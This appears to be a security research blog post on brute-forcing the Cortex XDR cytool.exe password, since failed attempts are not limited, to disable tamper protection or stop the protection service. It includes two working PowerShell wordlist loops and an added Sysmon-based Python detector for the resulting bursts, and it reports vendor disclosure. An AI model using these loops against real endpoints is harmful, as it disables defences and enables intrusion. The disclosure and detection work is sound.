Combined attacks against XDR


Although XDR products appear bulletproof against new threats thanks to continually updated built-in defensive techniques and procedures, there are small holes in the way such products are developed that could let intruders gain the ability to disable or suspend the agent, or even use it as a means of persistence.

In this article I am going to highlight some of these weaknesses, which can be combined to break the protection level or even uninstall the whole solution.

During one of my engagements it was challenging to bypass the latest update of Cortex XDR, which I would say successfully prevented the majority of these combined attacks and became a blocked road for my goal.

At that time I was thinking about what is commonly possible once I have an administrative command line or access level: could I disable or even uninstall Cortex? From there I could easily continue to load my OffSec tools and achieve the goal of the engagement.

Unfortunately, Cortex enables tamper-prevention procedures by default to stop any attempt to uninstall the agent without the uninstallation password; the alternative is to do it from the management console, which I did not have access to.

By reading the documentation of the uninstallation procedure I figured out that a tool called cytool.exe accepts the password as raw CLI input, which means it is possible to simply echo the password into cytool.exe to check whether it is valid or not.

I am a local administrator!

I still believed that, as an administrator, I could find a way to disable it, but it would require abusing some of this miscoded behaviour and combining it like a puzzle to completely divert the agent's Cytool CLI.

Cytool is a command-line interface (CLI) that is integrated into Traps and enables you to query and manage both basic and advanced functions of Traps. Any changes you make using Cytool are active until Traps receives the next heartbeat communication from the Traps management service.

As we all know, many organizations use weak or easily guessed passwords to protect their agents. Starting from this idea, we could initiate a brute-force attack to check for a valid Cytool password, relying on the weakness that no limit is enforced on how many times an invalid password may be supplied.

Below is a working PoC for such an attack, which successfully disables tampering protection.

  1. Navigate to C:\Program Files\Palo Alto Networks\Traps
  2. Start PowerShell
  3. Execute the following PoC, supplied with your password list

# read the candidate passwords and pipe each one into cytool.exe as raw CLI input
$pwd_list = gc c:\users\lawre\passwords.txt
foreach ($obj in $pwd_list) {
    write-output $obj | .\cytool.exe protect disable
}

After a couple of minutes I was able to disable the tampering protection for all services, processes and registry keys, which easily allows me to uninstall the agent or modify registry settings to completely disable or suspend the node.

Disable the Cortex XDR

Yup, there is another way to do that: it is also possible to stop the service cyvrfsfd using cytool.exe (.\cytool.exe runtime stop cyvrfsfd), so we can use the same brute-force attack vector to successfully disable the whole protection service.

# same loop, but targeting the protection service instead of tamper protection
$pwd_list = gc c:\users\lawre\passwords.txt
foreach ($obj in $pwd_list) {
    write-output $obj | .\cytool.exe runtime stop cyvrfsfd
}
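
From the defender's side, the characteristic artefact of both PoCs above is a burst of cytool.exe process creations carrying "protect disable" or "runtime stop" on the command line, all from the same host and user within seconds of each other. The detection logic below is an added example, not part of the original post and not a Palo Alto tool; it runs over constructed records whose field names are assumed from Sysmon Event ID 1 (process creation) and alerts on any host exceeding a threshold of such launches inside a sliding window.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Field names follow Sysmon Event ID 1 (process creation); the records,
# hosts, users and timestamps are constructed for this example.
CYTOOL = "C:\\Program Files\\Palo Alto Networks\\Traps\\cytool.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

def _event(utc, host, user, parent, cmd):
    return json.dumps({"UtcTime": utc, "Computer": host, "User": user,
                       "ParentImage": parent, "Image": CYTOOL, "CommandLine": cmd})

# WS01: one cytool.exe launch every 2 seconds for 40 seconds (a wordlist loop);
# WS02: a single invocation, as an administrator working by hand would produce.
SAMPLE_EVENTS = [
    _event(f"2023-01-10 09:15:{s:02d}.000", "WS01", "WS01\\admin", PS,
           "cytool.exe protect disable") for s in range(0, 40, 2)
] + [_event("2023-01-10 11:00:00.000", "WS02", "WS02\\helpdesk",
            "C:\\Windows\\System32\\cmd.exe", "cytool.exe runtime stop cyvrfsfd")]

# Only the subcommands the post abuses are treated as tamper-relevant.
TAMPER_RE = re.compile(r"\b(protect\s+disable|runtime\s+stop)\b", re.IGNORECASE)

def detect_cytool_bursts(lines, window_s=60, threshold=5):
    """Return one alert per host whose tamper-relevant cytool.exe launches
    reach `threshold` inside any `window_s`-second sliding window."""
    per_host = defaultdict(list)
    for line in lines:
        ev = json.loads(line)
        if not ev["Image"].lower().endswith("\\cytool.exe"):
            continue
        if not TAMPER_RE.search(ev.get("CommandLine", "")):
            continue
        ts = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        per_host[ev["Computer"]].append((ts, ev["User"], ev["ParentImage"]))
    alerts = []
    for host, evs in sorted(per_host.items()):
        evs.sort(key=lambda e: e[0])
        start, best = 0, 0
        for end in range(len(evs)):  # two-pointer sliding window
            while evs[end][0] - evs[start][0] > timedelta(seconds=window_s):
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({"host": host, "user": evs[0][1], "parent": evs[0][2],
                           "count": best, "first_seen": evs[0][0].isoformat()})
    return alerts

if __name__ == "__main__":
    for alert in detect_cytool_bursts(SAMPLE_EVENTS):
        print(alert)
```

The single WS02 invocation stays below the threshold, so a legitimate administrator using the documented command does not fire the rule; the WS01 loop does.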


The research case has been tested on the latest version of Cortex XDR. The issue has been reported to the Cortex XDR PSIRT team, who said they were working on a fix, but there has been no official timeline or continuous follow-up from their side after around 3 months of reporting.
